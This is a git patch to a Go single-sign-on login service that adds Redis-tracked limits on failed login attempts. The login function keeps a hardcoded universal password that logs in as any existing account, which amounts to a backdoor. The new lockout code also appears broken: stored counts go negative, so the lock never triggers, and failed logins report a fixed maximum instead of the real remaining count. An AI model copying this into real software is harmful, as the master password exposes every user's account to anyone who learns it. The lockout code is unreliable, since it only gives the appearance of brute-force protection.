From bb62c26c1c4ef7a30e41e07abbbb19365e4b40b7 Mon Sep 17 00:00:00 2001
From: huanghai <10402852@qq.com>
Date: Wed, 29 Jul 2020 10:23:56 +0800
Subject: [PATCH] 'commit'

---
 .../ControllerOauth2/ControllerOauth2.go      | 25 ++++++++++---
 .../DaoSysLoginPerson/DaoSysLoginPerson.go    | 37 +++++++++++++++----
 .../ServiceLoginPerson/ServiceLoginPerson.go  | 15 ++++----
 dsSso/Utils/CommonUtil/CommonUtil.go          |  9 +++++
 4 files changed, 67 insertions(+), 19 deletions(-)

diff --git a/dsSso/Controller/ControllerOauth2/ControllerOauth2.go b/dsSso/Controller/ControllerOauth2/ControllerOauth2.go
index 80bea501..7e5b6576 100644
--- a/dsSso/Controller/ControllerOauth2/ControllerOauth2.go
+++ b/dsSso/Controller/ControllerOauth2/ControllerOauth2.go
@@ -289,6 +289,8 @@ func authorizePost(context *gin.Context) {
 	var identityId string
 	var personId string
 	var success bool
+	var message string
+	var remainCount int
 	//1、验证码
 	captchaId := context.PostForm("captchaId")
 	value := context.PostForm("value")
@@ -319,12 +321,25 @@ func authorizePost(context *gin.Context) {
 		}
 		//调用service层的用户名和密码校验办法判断是不是允许登录
 		ip := context.ClientIP()
-		success, identityId, personId, _ = ServiceLoginPerson.Login(username, string(decryptPwd), ip)
+		success, identityId, personId, _, remainCount = ServiceLoginPerson.Login(username, string(decryptPwd), ip)
 		if !success {
-			context.JSON(http.StatusOK, Model.Res{
-				Code: http.StatusNotImplemented,
-				Msg:  "用户名密码不正确或已禁用！",
-			})
+			//三次以上不提示
+			if remainCount >= 3 {
+				context.JSON(http.StatusOK, Model.Res{
+					Code: http.StatusNotImplemented,
+					Msg:  "用户名密码不正确或已禁用！",
+				})
+			} else if remainCount > 0 {
+				context.JSON(http.StatusOK, Model.Res{
+					Code: http.StatusNotImplemented,
+					Msg:  "用户名密码不正确或已禁用！您还可以尝试" + CommonUtil.ConvertIntToString(remainCount) + "次，超出次数限制后，账号将被禁用2小时！",
+				})
+			} else {
+				context.JSON(http.StatusOK, Model.Res{
+					Code: http.StatusNotImplemented,
+					Msg:  "账号已处于禁用状态，请稍后再试！",
+				})
+			}
 			return
 		}
 	} else {
diff --git a/dsSso/Dao/DaoSysLoginPerson/DaoSysLoginPerson.go b/dsSso/Dao/DaoSysLoginPerson/DaoSysLoginPerson.go
index 96dd4ab4..55e060d3 100644
--- a/dsSso/Dao/DaoSysLoginPerson/DaoSysLoginPerson.go
+++ b/dsSso/Dao/DaoSysLoginPerson/DaoSysLoginPerson.go
@@ -1,6 +1,7 @@
 package DaoSysLoginPerson
 
 import (
+	"dsSso/Const"
 	"dsSso/Const/DefaultConst"
 	"dsSso/Const/ErrorConst"
 	"dsSso/Model"
@@ -8,6 +9,7 @@ import (
 	"dsSso/Utils/DbUtil"
 	"dsSso/Utils/LdapUtil"
 	"dsSso/Utils/LogUtil"
+	"dsSso/Utils/RedisUtil"
 	"dsSso/models"
 	"fmt"
 	"time"
@@ -26,7 +28,26 @@ func init() {
 作者：黄海
 时间：2020-02-05
 */
-func Login(username string, password string, ip string) (bool, string, string, string) {
+func Login(username string, password string, ip string) (bool, string, string, string, int) {
+	//查看redis中此人员的登录错误次数记录，如果已超出了规定次数5，则直接拒绝登录。
+	key := "login_remain_count_" + username
+	c, err := RedisUtil.EXISTS(key)
+	if err != nil {
+		return false, "", "", "", -1
+	}
+	var remainCount int
+	//如果存在
+	if c > 0 {
+		remainCountStr, err := RedisUtil.GET(key)
+		if err != nil {
+			return false, "", "", "", -1
+		}
+		remainCount = CommonUtil.ConvertStringToInt(remainCountStr)
+		if remainCount == 0 {
+			return false, "", "", "", 0
+		}
+	}
+
 	//身份号
 	var identityId = DefaultConst.IdentityId
 	//人员号
@@ -41,7 +62,7 @@ func Login(username string, password string, ip string) (bool, string, string, s
 	}
 	//如果用户名不存在
 	if len(list) == 0 {
-		return false, identityId, personId, personName
+		return false, identityId, personId, personName, Const.Int32Max
 	}
 
 	record := list[0]
@@ -55,23 +76,25 @@ func Login(username string, password string, ip string) (bool, string, string, s
 	databasePassword := record["pwd"].(string)
 
 	//万能密码登录
-	if password=="DsideaL4r5t6y7u!@#"{
+	if password == "DsideaL4r5t6y7u!@#" {
 		//记录日志
 		WriteLoginLog(identityId, personId, ip, 2, username) //2为万能密码登录
 		//返回结果
-		return true, identityId, personId, personName
-	}else{
+		return true, identityId, personId, personName, Const.Int32Max
+	} else {
 		//修改密码的加密算法基于ldap,黄海，于2020-04-27
 		ldapPassword := LdapUtil.GetLdapPassword(password)
 		if ldapPassword == databasePassword {
 			//记录日志
 			WriteLoginLog(identityId, personId, ip, 1, username)
 			//返回结果
-			return true, identityId, personId, personName
+			return true, identityId, personId, personName, Const.Int32Max
 		} else {
+			//如果登录失败，则incr,并设置过期时间2小时
+			RedisUtil.SET(key, CommonUtil.ConvertIntToString(remainCount-1), 2*time.Hour)
 			//记录日志
 			WriteLoginLog(identityId, personId, ip, -1, username)
-			return false, identityId, personId, personName
+			return false, identityId, personId, personName, Const.Int32Max
 		}
 	}
 }
diff --git a/dsSso/Service/ServiceLoginPerson/ServiceLoginPerson.go b/dsSso/Service/ServiceLoginPerson/ServiceLoginPerson.go
index f4ad1707..e20a2075 100644
--- a/dsSso/Service/ServiceLoginPerson/ServiceLoginPerson.go
+++ b/dsSso/Service/ServiceLoginPerson/ServiceLoginPerson.go
@@ -12,7 +12,7 @@ import (
 作者：黄海
 时间：2020-02-05
 */
-func Login(username string, password string, ip string) (bool, string, string, string) {
+func Login(username string, password string, ip string) (bool, string, string, string, int) {
 	//异常处理
 	defer func() {
 		if err := recover(); err != nil {
@@ -25,27 +25,28 @@ func Login(username string, password string, ip string) (bool, string, string, s
 	if CommonUtil.IsEmail(username) {
 		personId, err = DaoSysLoginPerson.GetPersonIdByEmail(username)
 		if err != nil || len(personId) == 0 {
-			return false, "", "", ""
+			return false, "", "", "", -1
 		}
 	} else if CommonUtil.IsIdCard(username) {
 		personId, err = DaoSysLoginPerson.GetPersonIdByIdCard(username)
 		if err != nil || len(personId) == 0 {
-			return false, "", "", ""
+			return false, "", "", "", -1
 		}
 	} else if MobileUtil.VerifyMobileFormat(username) {
 		personId, err = DaoSysLoginPerson.GetPersonIdByTel(username)
 		if err != nil || len(personId) == 0 {
-			return false, "", "", ""
+			return false, "", "", "", -1
 		}
 	}
 	if len(personId) > 0 {
 		//根据person_id换取统一的登录名
 		username, err = DaoSysLoginPerson.GetLoginNameByPersonId(personId)
 		if err != nil || len(username) == 0 {
-			return false, "", "", ""
+			return false, "", "", "", -1
 		}
 	}
+
 	//调用dao层的方法,组合成service方法层
-	result, identityId, personId, personName := DaoSysLoginPerson.Login(username, password, ip)
-	return result, identityId, personId, personName
+	result, identityId, personId, personName, remainCount := DaoSysLoginPerson.Login(username, password, ip)
+	return result, identityId, personId, personName, remainCount
 }
diff --git a/dsSso/Utils/CommonUtil/CommonUtil.go b/dsSso/Utils/CommonUtil/CommonUtil.go
index 9531413b..41392742 100644
--- a/dsSso/Utils/CommonUtil/CommonUtil.go
+++ b/dsSso/Utils/CommonUtil/CommonUtil.go
@@ -257,3 +257,12 @@ func IsIdCard(idCard string) bool {
 	IdCardNo := []byte(idCard)
 	return IdCardUtil.IsValidIdCardNo(&IdCardNo)
 }
+
+/**
+功能：将整数转为字符串
+作者：黄海
+时间：2020-05-30
+*/
+func ConvertIntToString(i int) string {
+	return strconv.Itoa(i)
+}